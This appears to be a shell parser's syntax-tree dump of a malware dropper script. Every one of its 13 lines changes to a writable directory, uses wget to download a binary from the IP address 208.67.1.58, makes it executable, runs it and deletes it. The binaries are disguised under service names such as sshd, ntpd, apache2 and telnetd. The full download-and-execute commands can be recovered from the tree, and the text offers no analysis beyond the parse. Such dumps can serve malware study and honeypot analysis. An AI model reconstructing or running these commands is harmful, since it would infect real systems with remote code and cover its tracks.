ListNode(lineno=2, pos=(12, 131), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 95), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 95), word='http://208.67.1.58/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(95, 96)),
  CommandNode(lineno=2, pos=(97, 110), parts=[
    WordNode(lineno=2, pos=(97, 102), word='chmod'),
    WordNode(lineno=2, pos=(103, 105), word='+x'),
    WordNode(lineno=2, pos=(106, 110), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(110, 111)),
  CommandNode(lineno=2, pos=(112, 118), parts=[
    WordNode(lineno=2, pos=(112, 118), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(118, 119)),
  CommandNode(lineno=2, pos=(120, 131), parts=[
    WordNode(lineno=2, pos=(120, 122), word='rm'),
    WordNode(lineno=2, pos=(123, 126), word='-rf'),
    WordNode(lineno=2, pos=(127, 131), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(132, 251), parts=[
  CommandNode(lineno=3, pos=(132, 139), parts=[
    WordNode(lineno=3, pos=(132, 134), word='cd'),
    WordNode(lineno=3, pos=(135, 139), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(140, 142)),
  CommandNode(lineno=3, pos=(143, 154), parts=[
    WordNode(lineno=3, pos=(143, 145), word='cd'),
    WordNode(lineno=3, pos=(146, 154), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(155, 157)),
  CommandNode(lineno=3, pos=(158, 165), parts=[
    WordNode(lineno=3, pos=(158, 160), word='cd'),
    WordNode(lineno=3, pos=(161, 165), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(166, 168)),
  CommandNode(lineno=3, pos=(169, 177), parts=[
    WordNode(lineno=3, pos=(169, 171), word='cd'),
    WordNode(lineno=3, pos=(172, 177), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(178, 180)),
  CommandNode(lineno=3, pos=(181, 185), parts=[
    WordNode(lineno=3, pos=(181, 183), word='cd'),
    WordNode(lineno=3, pos=(184, 185), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(185, 186)),
  CommandNode(lineno=3, pos=(187, 215), parts=[
    WordNode(lineno=3, pos=(187, 191), word='wget'),
    WordNode(lineno=3, pos=(192, 215), word='http://208.67.1.58/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(215, 216)),
  CommandNode(lineno=3, pos=(217, 230), parts=[
    WordNode(lineno=3, pos=(217, 222), word='chmod'),
    WordNode(lineno=3, pos=(223, 225), word='+x'),
    WordNode(lineno=3, pos=(226, 230), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(230, 231)),
  CommandNode(lineno=3, pos=(232, 238), parts=[
    WordNode(lineno=3, pos=(232, 238), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(238, 239)),
  CommandNode(lineno=3, pos=(240, 251), parts=[
    WordNode(lineno=3, pos=(240, 242), word='rm'),
    WordNode(lineno=3, pos=(243, 246), word='-rf'),
    WordNode(lineno=3, pos=(247, 251), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(252, 383), parts=[
  CommandNode(lineno=4, pos=(252, 259), parts=[
    WordNode(lineno=4, pos=(252, 254), word='cd'),
    WordNode(lineno=4, pos=(255, 259), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(260, 262)),
  CommandNode(lineno=4, pos=(263, 274), parts=[
    WordNode(lineno=4, pos=(263, 265), word='cd'),
    WordNode(lineno=4, pos=(266, 274), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(275, 277)),
  CommandNode(lineno=4, pos=(278, 285), parts=[
    WordNode(lineno=4, pos=(278, 280), word='cd'),
    WordNode(lineno=4, pos=(281, 285), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(286, 288)),
  CommandNode(lineno=4, pos=(289, 297), parts=[
    WordNode(lineno=4, pos=(289, 291), word='cd'),
    WordNode(lineno=4, pos=(292, 297), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(298, 300)),
  CommandNode(lineno=4, pos=(301, 305), parts=[
    WordNode(lineno=4, pos=(301, 303), word='cd'),
    WordNode(lineno=4, pos=(304, 305), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(305, 306)),
  CommandNode(lineno=4, pos=(307, 338), parts=[
    WordNode(lineno=4, pos=(307, 311), word='wget'),
    WordNode(lineno=4, pos=(312, 338), word='http://208.67.1.58/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(338, 339)),
  CommandNode(lineno=4, pos=(340, 356), parts=[
    WordNode(lineno=4, pos=(340, 345), word='chmod'),
    WordNode(lineno=4, pos=(346, 348), word='+x'),
    WordNode(lineno=4, pos=(349, 356), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(356, 357)),
  CommandNode(lineno=4, pos=(358, 367), parts=[
    WordNode(lineno=4, pos=(358, 367), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(367, 368)),
  CommandNode(lineno=4, pos=(369, 383), parts=[
    WordNode(lineno=4, pos=(369, 371), word='rm'),
    WordNode(lineno=4, pos=(372, 375), word='-rf'),
    WordNode(lineno=4, pos=(376, 383), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(384, 503), parts=[
  CommandNode(lineno=5, pos=(384, 391), parts=[
    WordNode(lineno=5, pos=(384, 386), word='cd'),
    WordNode(lineno=5, pos=(387, 391), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(392, 394)),
  CommandNode(lineno=5, pos=(395, 406), parts=[
    WordNode(lineno=5, pos=(395, 397), word='cd'),
    WordNode(lineno=5, pos=(398, 406), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(407, 409)),
  CommandNode(lineno=5, pos=(410, 417), parts=[
    WordNode(lineno=5, pos=(410, 412), word='cd'),
    WordNode(lineno=5, pos=(413, 417), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(418, 420)),
  CommandNode(lineno=5, pos=(421, 429), parts=[
    WordNode(lineno=5, pos=(421, 423), word='cd'),
    WordNode(lineno=5, pos=(424, 429), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(430, 432)),
  CommandNode(lineno=5, pos=(433, 437), parts=[
    WordNode(lineno=5, pos=(433, 435), word='cd'),
    WordNode(lineno=5, pos=(436, 437), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(437, 438)),
  CommandNode(lineno=5, pos=(439, 467), parts=[
    WordNode(lineno=5, pos=(439, 443), word='wget'),
    WordNode(lineno=5, pos=(444, 467), word='http://208.67.1.58/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(467, 468)),
  CommandNode(lineno=5, pos=(469, 482), parts=[
    WordNode(lineno=5, pos=(469, 474), word='chmod'),
    WordNode(lineno=5, pos=(475, 477), word='+x'),
    WordNode(lineno=5, pos=(478, 482), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(482, 483)),
  CommandNode(lineno=5, pos=(484, 490), parts=[
    WordNode(lineno=5, pos=(484, 490), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(490, 491)),
  CommandNode(lineno=5, pos=(492, 503), parts=[
    WordNode(lineno=5, pos=(492, 494), word='rm'),
    WordNode(lineno=5, pos=(495, 498), word='-rf'),
    WordNode(lineno=5, pos=(499, 503), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(504, 623), parts=[
  CommandNode(lineno=6, pos=(504, 511), parts=[
    WordNode(lineno=6, pos=(504, 506), word='cd'),
    WordNode(lineno=6, pos=(507, 511), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(512, 514)),
  CommandNode(lineno=6, pos=(515, 526), parts=[
    WordNode(lineno=6, pos=(515, 517), word='cd'),
    WordNode(lineno=6, pos=(518, 526), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(527, 529)),
  CommandNode(lineno=6, pos=(530, 537), parts=[
    WordNode(lineno=6, pos=(530, 532), word='cd'),
    WordNode(lineno=6, pos=(533, 537), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(538, 540)),
  CommandNode(lineno=6, pos=(541, 549), parts=[
    WordNode(lineno=6, pos=(541, 543), word='cd'),
    WordNode(lineno=6, pos=(544, 549), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(550, 552)),
  CommandNode(lineno=6, pos=(553, 557), parts=[
    WordNode(lineno=6, pos=(553, 555), word='cd'),
    WordNode(lineno=6, pos=(556, 557), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(557, 558)),
  CommandNode(lineno=6, pos=(559, 587), parts=[
    WordNode(lineno=6, pos=(559, 563), word='wget'),
    WordNode(lineno=6, pos=(564, 587), word='http://208.67.1.58/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(587, 588)),
  CommandNode(lineno=6, pos=(589, 602), parts=[
    WordNode(lineno=6, pos=(589, 594), word='chmod'),
    WordNode(lineno=6, pos=(595, 597), word='+x'),
    WordNode(lineno=6, pos=(598, 602), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(602, 603)),
  CommandNode(lineno=6, pos=(604, 610), parts=[
    WordNode(lineno=6, pos=(604, 610), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(610, 611)),
  CommandNode(lineno=6, pos=(612, 623), parts=[
    WordNode(lineno=6, pos=(612, 614), word='rm'),
    WordNode(lineno=6, pos=(615, 618), word='-rf'),
    WordNode(lineno=6, pos=(619, 623), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(624, 743), parts=[
  CommandNode(lineno=7, pos=(624, 631), parts=[
    WordNode(lineno=7, pos=(624, 626), word='cd'),
    WordNode(lineno=7, pos=(627, 631), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(632, 634)),
  CommandNode(lineno=7, pos=(635, 646), parts=[
    WordNode(lineno=7, pos=(635, 637), word='cd'),
    WordNode(lineno=7, pos=(638, 646), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(647, 649)),
  CommandNode(lineno=7, pos=(650, 657), parts=[
    WordNode(lineno=7, pos=(650, 652), word='cd'),
    WordNode(lineno=7, pos=(653, 657), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(658, 660)),
  CommandNode(lineno=7, pos=(661, 669), parts=[
    WordNode(lineno=7, pos=(661, 663), word='cd'),
    WordNode(lineno=7, pos=(664, 669), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(670, 672)),
  CommandNode(lineno=7, pos=(673, 677), parts=[
    WordNode(lineno=7, pos=(673, 675), word='cd'),
    WordNode(lineno=7, pos=(676, 677), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(677, 678)),
  CommandNode(lineno=7, pos=(679, 707), parts=[
    WordNode(lineno=7, pos=(679, 683), word='wget'),
    WordNode(lineno=7, pos=(684, 707), word='http://208.67.1.58/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(707, 708)),
  CommandNode(lineno=7, pos=(709, 722), parts=[
    WordNode(lineno=7, pos=(709, 714), word='chmod'),
    WordNode(lineno=7, pos=(715, 717), word='+x'),
    WordNode(lineno=7, pos=(718, 722), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(722, 723)),
  CommandNode(lineno=7, pos=(724, 730), parts=[
    WordNode(lineno=7, pos=(724, 730), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(730, 731)),
  CommandNode(lineno=7, pos=(732, 743), parts=[
    WordNode(lineno=7, pos=(732, 734), word='rm'),
    WordNode(lineno=7, pos=(735, 738), word='-rf'),
    WordNode(lineno=7, pos=(739, 743), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(744, 863), parts=[
  CommandNode(lineno=8, pos=(744, 751), parts=[
    WordNode(lineno=8, pos=(744, 746), word='cd'),
    WordNode(lineno=8, pos=(747, 751), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(752, 754)),
  CommandNode(lineno=8, pos=(755, 766), parts=[
    WordNode(lineno=8, pos=(755, 757), word='cd'),
    WordNode(lineno=8, pos=(758, 766), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(767, 769)),
  CommandNode(lineno=8, pos=(770, 777), parts=[
    WordNode(lineno=8, pos=(770, 772), word='cd'),
    WordNode(lineno=8, pos=(773, 777), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(778, 780)),
  CommandNode(lineno=8, pos=(781, 789), parts=[
    WordNode(lineno=8, pos=(781, 783), word='cd'),
    WordNode(lineno=8, pos=(784, 789), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(790, 792)),
  CommandNode(lineno=8, pos=(793, 797), parts=[
    WordNode(lineno=8, pos=(793, 795), word='cd'),
    WordNode(lineno=8, pos=(796, 797), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(797, 798)),
  CommandNode(lineno=8, pos=(799, 827), parts=[
    WordNode(lineno=8, pos=(799, 803), word='wget'),
    WordNode(lineno=8, pos=(804, 827), word='http://208.67.1.58/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(827, 828)),
  CommandNode(lineno=8, pos=(829, 842), parts=[
    WordNode(lineno=8, pos=(829, 834), word='chmod'),
    WordNode(lineno=8, pos=(835, 837), word='+x'),
    WordNode(lineno=8, pos=(838, 842), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(842, 843)),
  CommandNode(lineno=8, pos=(844, 850), parts=[
    WordNode(lineno=8, pos=(844, 850), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(850, 851)),
  CommandNode(lineno=8, pos=(852, 863), parts=[
    WordNode(lineno=8, pos=(852, 854), word='rm'),
    WordNode(lineno=8, pos=(855, 858), word='-rf'),
    WordNode(lineno=8, pos=(859, 863), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(864, 979), parts=[
  CommandNode(lineno=9, pos=(864, 871), parts=[
    WordNode(lineno=9, pos=(864, 866), word='cd'),
    WordNode(lineno=9, pos=(867, 871), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(872, 874)),
  CommandNode(lineno=9, pos=(875, 886), parts=[
    WordNode(lineno=9, pos=(875, 877), word='cd'),
    WordNode(lineno=9, pos=(878, 886), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(887, 889)),
  CommandNode(lineno=9, pos=(890, 897), parts=[
    WordNode(lineno=9, pos=(890, 892), word='cd'),
    WordNode(lineno=9, pos=(893, 897), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(898, 900)),
  CommandNode(lineno=9, pos=(901, 909), parts=[
    WordNode(lineno=9, pos=(901, 903), word='cd'),
    WordNode(lineno=9, pos=(904, 909), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(910, 912)),
  CommandNode(lineno=9, pos=(913, 917), parts=[
    WordNode(lineno=9, pos=(913, 915), word='cd'),
    WordNode(lineno=9, pos=(916, 917), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(917, 918)),
  CommandNode(lineno=9, pos=(919, 946), parts=[
    WordNode(lineno=9, pos=(919, 923), word='wget'),
    WordNode(lineno=9, pos=(924, 946), word='http://208.67.1.58/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(946, 947)),
  CommandNode(lineno=9, pos=(948, 960), parts=[
    WordNode(lineno=9, pos=(948, 953), word='chmod'),
    WordNode(lineno=9, pos=(954, 956), word='+x'),
    WordNode(lineno=9, pos=(957, 960), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(960, 961)),
  CommandNode(lineno=9, pos=(962, 967), parts=[
    WordNode(lineno=9, pos=(962, 967), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(967, 968)),
  CommandNode(lineno=9, pos=(969, 979), parts=[
    WordNode(lineno=9, pos=(969, 971), word='rm'),
    WordNode(lineno=9, pos=(972, 975), word='-rf'),
    WordNode(lineno=9, pos=(976, 979), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(980, 1099), parts=[
  CommandNode(lineno=10, pos=(980, 987), parts=[
    WordNode(lineno=10, pos=(980, 982), word='cd'),
    WordNode(lineno=10, pos=(983, 987), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(988, 990)),
  CommandNode(lineno=10, pos=(991, 1002), parts=[
    WordNode(lineno=10, pos=(991, 993), word='cd'),
    WordNode(lineno=10, pos=(994, 1002), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1003, 1005)),
  CommandNode(lineno=10, pos=(1006, 1013), parts=[
    WordNode(lineno=10, pos=(1006, 1008), word='cd'),
    WordNode(lineno=10, pos=(1009, 1013), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1014, 1016)),
  CommandNode(lineno=10, pos=(1017, 1025), parts=[
    WordNode(lineno=10, pos=(1017, 1019), word='cd'),
    WordNode(lineno=10, pos=(1020, 1025), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1026, 1028)),
  CommandNode(lineno=10, pos=(1029, 1033), parts=[
    WordNode(lineno=10, pos=(1029, 1031), word='cd'),
    WordNode(lineno=10, pos=(1032, 1033), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1033, 1034)),
  CommandNode(lineno=10, pos=(1035, 1063), parts=[
    WordNode(lineno=10, pos=(1035, 1039), word='wget'),
    WordNode(lineno=10, pos=(1040, 1063), word='http://208.67.1.58/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1063, 1064)),
  CommandNode(lineno=10, pos=(1065, 1078), parts=[
    WordNode(lineno=10, pos=(1065, 1070), word='chmod'),
    WordNode(lineno=10, pos=(1071, 1073), word='+x'),
    WordNode(lineno=10, pos=(1074, 1078), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1078, 1079)),
  CommandNode(lineno=10, pos=(1080, 1086), parts=[
    WordNode(lineno=10, pos=(1080, 1086), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1086, 1087)),
  CommandNode(lineno=10, pos=(1088, 1099), parts=[
    WordNode(lineno=10, pos=(1088, 1090), word='rm'),
    WordNode(lineno=10, pos=(1091, 1094), word='-rf'),
    WordNode(lineno=10, pos=(1095, 1099), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1100, 1211), parts=[
  CommandNode(lineno=11, pos=(1100, 1107), parts=[
    WordNode(lineno=11, pos=(1100, 1102), word='cd'),
    WordNode(lineno=11, pos=(1103, 1107), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1108, 1110)),
  CommandNode(lineno=11, pos=(1111, 1122), parts=[
    WordNode(lineno=11, pos=(1111, 1113), word='cd'),
    WordNode(lineno=11, pos=(1114, 1122), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1123, 1125)),
  CommandNode(lineno=11, pos=(1126, 1133), parts=[
    WordNode(lineno=11, pos=(1126, 1128), word='cd'),
    WordNode(lineno=11, pos=(1129, 1133), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1134, 1136)),
  CommandNode(lineno=11, pos=(1137, 1145), parts=[
    WordNode(lineno=11, pos=(1137, 1139), word='cd'),
    WordNode(lineno=11, pos=(1140, 1145), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1146, 1148)),
  CommandNode(lineno=11, pos=(1149, 1153), parts=[
    WordNode(lineno=11, pos=(1149, 1151), word='cd'),
    WordNode(lineno=11, pos=(1152, 1153), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1153, 1154)),
  CommandNode(lineno=11, pos=(1155, 1181), parts=[
    WordNode(lineno=11, pos=(1155, 1159), word='wget'),
    WordNode(lineno=11, pos=(1160, 1181), word='http://208.67.1.58/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1181, 1182)),
  CommandNode(lineno=11, pos=(1183, 1194), parts=[
    WordNode(lineno=11, pos=(1183, 1188), word='chmod'),
    WordNode(lineno=11, pos=(1189, 1191), word='+x'),
    WordNode(lineno=11, pos=(1192, 1194), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1194, 1195)),
  CommandNode(lineno=11, pos=(1196, 1200), parts=[
    WordNode(lineno=11, pos=(1196, 1200), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1200, 1201)),
  CommandNode(lineno=11, pos=(1202, 1211), parts=[
    WordNode(lineno=11, pos=(1202, 1204), word='rm'),
    WordNode(lineno=11, pos=(1205, 1208), word='-rf'),
    WordNode(lineno=11, pos=(1209, 1211), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1212, 1327), parts=[
  CommandNode(lineno=12, pos=(1212, 1219), parts=[
    WordNode(lineno=12, pos=(1212, 1214), word='cd'),
    WordNode(lineno=12, pos=(1215, 1219), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1220, 1222)),
  CommandNode(lineno=12, pos=(1223, 1234), parts=[
    WordNode(lineno=12, pos=(1223, 1225), word='cd'),
    WordNode(lineno=12, pos=(1226, 1234), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1235, 1237)),
  CommandNode(lineno=12, pos=(1238, 1245), parts=[
    WordNode(lineno=12, pos=(1238, 1240), word='cd'),
    WordNode(lineno=12, pos=(1241, 1245), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1246, 1248)),
  CommandNode(lineno=12, pos=(1249, 1257), parts=[
    WordNode(lineno=12, pos=(1249, 1251), word='cd'),
    WordNode(lineno=12, pos=(1252, 1257), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1258, 1260)),
  CommandNode(lineno=12, pos=(1261, 1265), parts=[
    WordNode(lineno=12, pos=(1261, 1263), word='cd'),
    WordNode(lineno=12, pos=(1264, 1265), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1265, 1266)),
  CommandNode(lineno=12, pos=(1267, 1294), parts=[
    WordNode(lineno=12, pos=(1267, 1271), word='wget'),
    WordNode(lineno=12, pos=(1272, 1294), word='http://208.67.1.58/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1294, 1295)),
  CommandNode(lineno=12, pos=(1296, 1308), parts=[
    WordNode(lineno=12, pos=(1296, 1301), word='chmod'),
    WordNode(lineno=12, pos=(1302, 1304), word='+x'),
    WordNode(lineno=12, pos=(1305, 1308), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1308, 1309)),
  CommandNode(lineno=12, pos=(1310, 1315), parts=[
    WordNode(lineno=12, pos=(1310, 1315), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1315, 1316)),
  CommandNode(lineno=12, pos=(1317, 1327), parts=[
    WordNode(lineno=12, pos=(1317, 1319), word='rm'),
    WordNode(lineno=12, pos=(1320, 1323), word='-rf'),
    WordNode(lineno=12, pos=(1324, 1327), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1328, 1459), parts=[
  CommandNode(lineno=13, pos=(1328, 1335), parts=[
    WordNode(lineno=13, pos=(1328, 1330), word='cd'),
    WordNode(lineno=13, pos=(1331, 1335), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1336, 1338)),
  CommandNode(lineno=13, pos=(1339, 1350), parts=[
    WordNode(lineno=13, pos=(1339, 1341), word='cd'),
    WordNode(lineno=13, pos=(1342, 1350), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1351, 1353)),
  CommandNode(lineno=13, pos=(1354, 1361), parts=[
    WordNode(lineno=13, pos=(1354, 1356), word='cd'),
    WordNode(lineno=13, pos=(1357, 1361), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1362, 1364)),
  CommandNode(lineno=13, pos=(1365, 1373), parts=[
    WordNode(lineno=13, pos=(1365, 1367), word='cd'),
    WordNode(lineno=13, pos=(1368, 1373), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1374, 1376)),
  CommandNode(lineno=13, pos=(1377, 1381), parts=[
    WordNode(lineno=13, pos=(1377, 1379), word='cd'),
    WordNode(lineno=13, pos=(1380, 1381), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1381, 1382)),
  CommandNode(lineno=13, pos=(1383, 1414), parts=[
    WordNode(lineno=13, pos=(1383, 1387), word='wget'),
    WordNode(lineno=13, pos=(1388, 1414), word='http://208.67.1.58/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1414, 1415)),
  CommandNode(lineno=13, pos=(1416, 1432), parts=[
    WordNode(lineno=13, pos=(1416, 1421), word='chmod'),
    WordNode(lineno=13, pos=(1422, 1424), word='+x'),
    WordNode(lineno=13, pos=(1425, 1432), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1432, 1433)),
  CommandNode(lineno=13, pos=(1434, 1443), parts=[
    WordNode(lineno=13, pos=(1434, 1443), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1443, 1444)),
  CommandNode(lineno=13, pos=(1445, 1459), parts=[
    WordNode(lineno=13, pos=(1445, 1447), word='rm'),
    WordNode(lineno=13, pos=(1448, 1451), word='-rf'),
    WordNode(lineno=13, pos=(1452, 1459), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1460, 1591), parts=[
  CommandNode(lineno=14, pos=(1460, 1467), parts=[
    WordNode(lineno=14, pos=(1460, 1462), word='cd'),
    WordNode(lineno=14, pos=(1463, 1467), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1468, 1470)),
  CommandNode(lineno=14, pos=(1471, 1482), parts=[
    WordNode(lineno=14, pos=(1471, 1473), word='cd'),
    WordNode(lineno=14, pos=(1474, 1482), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1483, 1485)),
  CommandNode(lineno=14, pos=(1486, 1493), parts=[
    WordNode(lineno=14, pos=(1486, 1488), word='cd'),
    WordNode(lineno=14, pos=(1489, 1493), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1494, 1496)),
  CommandNode(lineno=14, pos=(1497, 1505), parts=[
    WordNode(lineno=14, pos=(1497, 1499), word='cd'),
    WordNode(lineno=14, pos=(1500, 1505), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1506, 1508)),
  CommandNode(lineno=14, pos=(1509, 1513), parts=[
    WordNode(lineno=14, pos=(1509, 1511), word='cd'),
    WordNode(lineno=14, pos=(1512, 1513), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1513, 1514)),
  CommandNode(lineno=14, pos=(1515, 1546), parts=[
    WordNode(lineno=14, pos=(1515, 1519), word='wget'),
    WordNode(lineno=14, pos=(1520, 1546), word='http://208.67.1.58/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1546, 1547)),
  CommandNode(lineno=14, pos=(1548, 1564), parts=[
    WordNode(lineno=14, pos=(1548, 1553), word='chmod'),
    WordNode(lineno=14, pos=(1554, 1556), word='+x'),
    WordNode(lineno=14, pos=(1557, 1564), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1564, 1565)),
  CommandNode(lineno=14, pos=(1566, 1575), parts=[
    WordNode(lineno=14, pos=(1566, 1575), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1575, 1576)),
  CommandNode(lineno=14, pos=(1577, 1591), parts=[
    WordNode(lineno=14, pos=(1577, 1579), word='rm'),
    WordNode(lineno=14, pos=(1580, 1583), word='-rf'),
    WordNode(lineno=14, pos=(1584, 1591), word='telnetd'),
  ]),
])
